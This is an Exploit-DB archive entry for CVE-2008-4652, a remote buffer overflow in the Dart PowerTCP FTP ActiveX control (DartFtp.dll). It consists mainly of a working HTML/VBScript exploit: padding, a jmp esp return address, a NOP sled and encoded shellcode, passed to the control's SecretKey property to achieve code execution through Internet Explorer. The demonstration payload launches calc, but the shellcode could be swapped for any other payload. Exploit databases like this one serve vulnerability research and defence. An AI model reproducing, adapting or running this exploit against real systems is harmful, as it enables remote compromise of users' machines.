Dart Communications PowerTCP FTP module - Remote Buffer Overflow

EDB-ID:

6793

CVE:

2008-4652

EDB Verified:

Author:

InTeL

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2008-10-20

Vulnerable App: 
<html>
<pre>
Author: Intel
Discovered by: Intel

Software: PowerTCP ActiveX
Vulnerable Component: DartFtp.dll 
Version: 2.0.2.0
Website: www.dart.com
Description: 

"PowerTCP tools from Dart Communications are comprehensive tools you can 
include in your programs to perform common TCP/IP functions, including FTP, 
HTTP, SMTP, POP3, telnet, and SNMP. In addition, Dart supplies a series of 
other tools, such as a Zip compressor and a VT320 terminal emulator. This 
review, however, will focus only on two tools: the FTP Tool and the Mail Tool, 
which supports SMTP and POP3."

RegKey Safe for Script: False
RegkeySafe for Init: True
KillBitSet: False

Tested on Vista SP1 fully patched and IE7


<object classid='clsid:39FDA070-61BA-11D2-AD84-00105A17B608' id='pwn'></object>
  <input language=VBScript onclick=Launch() type=button value="Launch Exploit">
   <script language = 'vbscript'>
    Sub Launch

     buff = String (1684, "A")
     RET = unescape("%5F%DC%02%10%cc") //jmp esp in DartFtp.DLL, we added in int3 because without it our nop sled would cause an access violation
     nop = String(22, unescape("%90"))


//Exec Calc Scode
     shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" & _
                          "%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" & _
                          "%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" & _
                          "%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" & _
                          "%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" & _
                          "%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" & _
                          "%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" & _
                          "%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" & _
                          "%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" & _
                          "%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" & _
                          "%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" & _
                          "%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" & _
                          "%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" & _
                          "%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" & _
                          "%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" & _
                          "%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" & _
                          "%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" & _
                          "%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" & _
                          "%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" & _
                          "%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" & _
                          "%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" & _
                          "%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" & _
                          "%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" & _
                          "%4e%31%75%74%38%70%65%77%70%43")


     naughtybuffer = buff + ret + nop + shellcode + nop

     pwn.SecretKey = naughtybuffer

    End Sub
   </script>
</html>

# milw0rm.com [2008-10-20]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services